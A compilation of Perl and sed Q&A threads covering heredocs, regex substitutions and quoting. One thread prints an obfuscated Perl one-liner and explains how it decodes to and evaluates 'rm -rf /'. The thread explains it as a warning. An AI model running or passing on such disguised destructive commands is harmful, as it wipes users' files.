What does ENDOFTEXT mean in this Perl code? - perl

I'd like to know what ENDOFTEXT means in this Perl script:
print <<ENDOFTEXT;
HTTP/1.0 200 OK
Content-Type: text/html
<HTML>
<HEAD><TITLE>Hello World!</TITLE></HEAD>
<BODY>
<H4>Hello World!</H4>
<P>You have reached $url</P>
<P>Your IP Address is $ip</P>
<H5>Have a nice day!</H5>
</BODY>
</HTML>
ENDOFTEXT
exit(0);

It is an operator, called a heredoc or here-document. Amusingly enough the reference in perldoc is not as easy to find as it should be. It is useful for being able to quote a large section of text without having to bother with escaping special variables.
You can read the Here document article on wikipedia as well. The entry you are looking for is <<EOF under Quote-and-Quote-like-Operators from perldoc. I'm citing it here for ease of use:
A line-oriented form of quoting is
based on the shell "here-document"
syntax. Following a << you specify a
string to terminate the quoted
material, and all lines following the
current line down to the terminating
string are the value of the item. The
terminating string may be either an
identifier (a word), or some quoted
text. An unquoted identifier works
like double quotes. There may not be a
space between the << and the
identifier, unless the identifier is
explicitly quoted. (If you put a space
it will be treated as a null
identifier, which is valid, and
matches the first empty line.)
The
terminating string must appear by
itself (unquoted and with no
surrounding whitespace) on the
terminating line.
If the terminating
string is quoted, the type of quotes
used determine the treatment of the
text.

It's a here-document or heredoc. The ENDOFTEXT is just some arbitrary sequence that marks the end of it; it doesn't mean anything in itself. (I would be more inclined to use END but that's just personal taste.)

In addition to what other people said, I should note that the book Perl Best Practices recommends to avoid using bareword here-docs (e.g: "<<EOF") and instead explicitly quote every here-doc as either <<'EOF' or <<"EOF". This is because people often don't know what is the case for the bareword EOF.

The ENDOFTEXT string signifies the beginning and end of a "here-document". It is described in the official Perl documentation (search for EOF): Quote-and-Quote-like-Operators. It is an arbitrary string; the code could have used the string FOO with the same effect. It allows multi-line quoting, and in this case, variables will be interpolated.

Related

Not able to understand a command in perl

I need help to understand what below command is doing exactly
$abc{hier} =~ s#/tools.*/dfII/?.*##g;
and $abc{hier} contains a path "/home/test1/test2/test3"
Can someone please let me know what the above command is doing exactly. Thanks
s/PATTERN/REPLACEMENT/ is Perl's substitution operator. It searches a string for text that matches the regex PATTERN and replaces it with REPLACEMENT.
By default, the substitution operator works on $_. To tell it to work on a different variable, you use the binding operator - =~.
The default delimiter used by the substitution operator is a slash (/) but you can change that to any other character. This is useful if your PATTERN or your REPLACEMENT contains a slash. In this case, the programmer has used # as the delimiter.
To recap:
$abc{hier} =~ s#PATTERN#REPLACEMENT#;
means "look for text in $abc{hier} that matches PATTERN and replace it with REPLACEMENT.
The substitution operator also has various options that change its behaviour. They are added by putting letters after the final delimiter. In this case we have a g. That means "make the substitution global" - or match and change all occurrences of PATTERN.
In your case, the REPLACEMENT string is empty (we have two # characters next to each other). So we're replacing the PATTERN with nothing - effectively deleting whatever matches PATTERN.
So now we have:
$abc{hier} =~ s#PATTERN*##g;
And we know it means, "in the variable $abc{hier}, look for any string that matches PATTERN and replace it with nothing".
The last thing to look at is the PATTERN (or regular expression - "regex"). You can get the full definition of regexes in perldoc perlre. But to explain what we're using here:
/tools : is the fixed string "/tools"
.* : is zero or more of any character
/dfII : is the fixed string "/dfII"
/? : is an optional slash character
.* : is (again) zero or more of any character
So, basically, we're removing bits of a file path from a value that's stored in a hash.
This =~ means "Do a regex operation on that variable."
(Actually, as ikegami correctly reminds me, it is not necessarily only regex operations, because it could also be a transliteration.)
The operation in question is s#something#else#, which means replace the "something" with something "else".
The g at the end means "Do it for all occurences of something."
Since the "else" is empty, the replacement has the effect of deleting.
The "something" is a definition according to regex syntax, roughly it means "Starting with '/tools' and later containing '/dfII', followed pretty much by anything until the end."
Note, the regex mentions at the end /?.*. In detail, this would mean "A slash (/) , or maybe not (?), and then absolutely anything (.) any number of times including 0 times (*). Strictly speaking it is not necessary to define "slash or not", if it is followed by "anything any often", because "anything" includes as slash, and anyoften would include 0 or one time; whether it is followed by more "anything" or not. I.e. the /? could be omitted, without changing the behaviour.
(Thanks ikeagami for confirming.)
$abc{hier} =~ s#/tools.*/dfII/?.*##g;
The above commands use regular expression to strip/remove trailing /tools.*/dfII and
/tools.*/dfII/.* from value of hier member of %abc hash.
It is pretty basic perl except non standard regular expression limiters (# instead of standard /). It allows to avoid escaping / inside the regular expression (s/\/tools.*\/dfII\/?.*//g).
My personal preferred style-guide would make it s{/tools.*/dfII/?.*}{}g .

What does the following sed statement mean

sed 's/<img src=\"\([^"]*\).*/\1/g'
input:
<img src="geo.yahoo.com/b?s=792600534"; height="1" width="1" style="position: absolute;" />
output:
https://geo.yahoo.com/b?s=792600534
This part is the regular expression to match with a capturing group Later referred as \1 (first capturing group). It extracting the value of the src attribute.
First part if the regex -> <img src=\"
capturing group -> \([^"]*\)
rest of the regex -> .*
The expression inside the square brackets could be read as: "anything not a double quote".
sed is a scripting language. Its s command performs substitutions using regular expressions. The syntax is s/regex/replacement/flags. In your example, you have the regex
<img src=\"\([^"]*\).*
and the replacement
\1
and the flags
g
The regex is apparently attempting to parse HTML, which deserves you a place in a warm location where a friendly gentleman with a pitchfork helps you with motivational issues. Far, far away, God reluctantly ends the life of a fluffy kitten.
The regular expression contains a capturing group, which is simply the text which matched between the parentheses. The replacement \1 refers back to this captured text. So in brief, you are taking away the parts which matched around this captured string.
s/foo\(bar\)baz/\1/
replaces foobarbaz with just baz, retrieving the "baz" part from whatever matched, rather than hard-coding a replacement string.
The regular expression .* matches any character any number of times; the regular expression engine will prefer the longest, leftmost possible match.
The regular expression [^"]* matches a single character which is not (newline or) " and the * again says to match as many times as possible. So "\([^"]*\)" finds a double-quoted string, and captures its contents; the negated " prevents the regular expression from matching past the closing quote when matching as many characters as possible. (As noted in comments, the backslash before the first " is unnecessary, but basically harmless. It just tells us that whoever wrote this isn't a regex wizard.)
However, your example just implicitly includes the closing quote in the .* match which will simply match everything from the closing quote through to the end of the line.
The g flag says to repeat the substitution command as many times as possible; so if an input line contains multiple matches, all of them will be replaced. (Without the g flag, sed will just replace the first match it finds on a line.) But since you just removed the rest of the line, the flag isn't actually useful here; there can only ever be a single match.
The gentleman with the pitchfork doesn't want me to tell you this, but this code is not suitable for a general-purpose script. There is no guarantee that the src attribute of the img element will be immediately adjacent to the img opening tag with just a single space in between; HTML allows arbitrary spacing (including a line wrap) and you can have other attributes like id or alt or title which could go before or after the src attribute. The proper solution is to use a HTML parser to extract the src attributes of img tags with proper understanding of the surrounding syntax.
xmlstarlet sel -T -t -m "/img" -m "#src" -v '.' -n
... though the stray semicolon after the src attribute is a HTML syntax violation; is it really there in your input?
(xmlstarlet command line shamelessly adapted from https://stackoverflow.com/a/3174307/874188)

Perl specific code

The following program is in Perl.
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-#[-`{-};`-{/" -;;s;;$_;see'
Can somebody help me to understand how it works?
This bit of code's already been asked about on the Debian forums.
According to Lacek, the moderator on that thread, what the code originally did is rm -rf /, though they mention they've changed the version there so that people trying to figure out how it works don't delete their entire filesystem. There's also an explanation there of what the various parts of the Perl code do.
(Did you post this knowing what it did, or were you unaware of it?)
To quote Lacek's post on it:
Anyway, here is how the script works.
It is basically two regex substitutions and one transliteration.
Piping anything into its standard input makes no difference, the perl
code doesn't use its input in any way. If you split the long line on
the boundaries of the expressions, you get this:
$??s:;s:s;;$?::
s;;=]=>%-{\\>%<-{;;
y; -/:-#[-`{-};`-{/" -;;
s;;$_;see
The first line is a condition which does nothing save makes the code
look more difficult. If the previous command originated from the perl
code wasn't successful, it does some substitutions on the standard
input (which the program doesn't use, so effectively it substitutes
the nothing). Since no previous command exists, $? is always 0, so the
first line never gets executed.
The second line substitutes the
standard input (the nothing) for seemingly meaningless garbage.
The third line is a transliteration operator. It defines 4 ranges, in
which the characters gets substituted to the one range and the 4
characters given in the transliteration replacement. I'd prefer not to
write the whole transliteration table here, because it's a bit long.
If you are really interested, just write the characters in the defined
ranges (space to '/', ':' to '#', '[' to '(backtick)', and '{' to '}'), and
write next to them the characters from the replacement range ('(backtick)' to
'{'), and finally, write the remaining characters (/,", space and -)
from the replacement pattern. When you have this table, you can see
what character gets replaced to what.
The last line executes the
resulting command by substituting the nothing with the resulted string
(which is 'xterm'. Originally it was 'system"rm -rf /"', and is held
in $_), evaluates the substitution as an expression and executes it.
(I've substituted 'backtick' for the actual backtick character here so that the code auto-formatting doesn't kick in.)

What's the difference between single and double quotes in Perl?

I am just begining to learn Perl. I looked at the beginning perl page and started working.
It says:
The difference between single quotes and double quotes is that single quotes mean that their contents should be taken literally, while double quotes mean that their contents should be interpreted
When I run this program:
#!/usr/local/bin/perl
print "This string \n shows up on two lines.";
print 'This string \n shows up on only one.';
It outputs:
This string
shows up on two lines.
This string
shows up on only one.
Am I wrong somewhere?
the version of perl below:
perl -v
This is perl, v5.8.5 built for aix
Copyright 1987-2004, Larry Wall
Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using `man perl' or `perldoc perl'. If you have access to the
Internet, point your browser at http://www.perl.com/, the Perl Home Page.
I am inclined to say something is up with your shell/terminal, and whatever you are outputting to is interpreting the \n as a newline and that the problem is not with Perl.
To confirm: This Shouldn't Happen(TM) - in the first case I would expect to see a new line inserted, but with single quotes it ought to output literally the characters \n and not a new line.
In Perl, single-quoted strings do not expand backslash-escapes like \n or \t. The reason you're seeing them expanded is probably due to the nature of the shell that you're using, which is munging your output for some reason.
Everything you need to know about quoting and quote-like operators is in perlop.
To answer your specific question, double-quotes can turn certain sequences of literal characters into other characters. In your example, the double quotes turn the sequence of characters \ and n into the single character that represents a newline. In a single quoted string, that same literal sequence is just the literal \ and n characters.
By "interpreted", they mean that variable names and such will not be printed, but their values instead. \n is an escape sequence, so I'd think it would not be interpreted.
In addition to your O'Reilly link, a reference no less authoritative than the 'Programming Perl' book by Larry Wall, states that backslash interpolation does not occur in single quoted strings.
... much like Unix shell quotes: double quoted string literals are subject to
backslash and variable interpolation; single quoted strings are not
(except for \' and \\, so that you may ...)
Programing Perl, 2nd ed, 1996 page 16
So it would be interesting to see what your Perl does with
print 'Double backslash n: \\n';
As above, please show us the output from 'perl -v'.
And I believe I have confused the forum editor software, because that last Perl 'print' should have indented.
If you use the double quote it will be interpreted the \n as a newline.
But if you use the single quote it will not interpreted the \n as a newline.
For me it is working correctly.
file content
print "This string \n shows up on two lines.";
print 'This string \n shows up on only one.'

How can I prevent Perl from interpreting \ as an escape character?

How can I print a address string without making Perl take the slashes as escape characters? I don't want to alter the string by adding more escape characters also.
What you're asking about is called interpolation. See the documentation for "Quote-Like Operators" at perldoc perlop, but more specifically the way to do it is with the syntax called the "here-document" combined with single quotes:
Single quotes indicate the text is to be treated literally with no interpolation of its content. This is similar to single quoted strings except that backslashes have no special meaning, with \ being treated as two backslashes and not one as they would in every other quoting construct.
This is the only form of quoting in perl where there is no need to worry about escaping content, something that code generators can and do make good use of.
For example:
my $address = <<'EOF';
blah#blah.blah.com\with\backslashes\all\over\theplace
EOF
You may want to read up on the various other quoting operators such as qw and qq (at the same document as I referenced above), as they are very commonly used and make good shorthand for other more long-winded ways of escaping content.
Use single quotes. For example
print 'lots\of\backslashes', "\n";
gives
lots\of\backslashes
If you want to interpolate variables, use the . operator, as in
$var = "pesky";
print 'lots\of\\' . $var . '\backslashes', "\n";
Notice that you have to escape the backslash at the end of the string.
As an alternative, you could use join:
print join("\\" => "lots", "of", $var, "backslashes"), "\n";
We could give much more helpful answers if you'd give us sample code.
It depends what you're escaping, but the Quote-like operators may help.
See the perlop man page.
Use the backslah two times,
print "This is a backslah character \\";